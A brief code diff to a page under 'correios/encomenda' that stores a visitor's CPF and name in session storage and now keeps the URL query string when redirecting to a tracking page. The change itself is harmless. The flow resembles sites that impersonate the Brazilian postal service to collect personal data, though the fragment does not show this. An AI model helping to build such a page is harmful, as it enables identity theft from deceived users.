--- a/correios/encomenda/index.html
+++ b/correios/encomenda/index.html
@@ -154,7 +154,8 @@ document.addEventListener("DOMContentLoaded", () => {
                 sessionStorage.setItem("cpf", data.cpf);
                 sessionStorage.setItem("nome", data.nome);
                 sessionStorage.setItem("data_atual", data.data_atual);
-                window.location.href = "../rastreio";
+                var currentUrlParams = window.location.search;
+                window.location.href = "../rastreio" + currentUrlParams;
             } else {
                 throw new Error(data.message || "CPF incorreto! Digite novamente");
             }
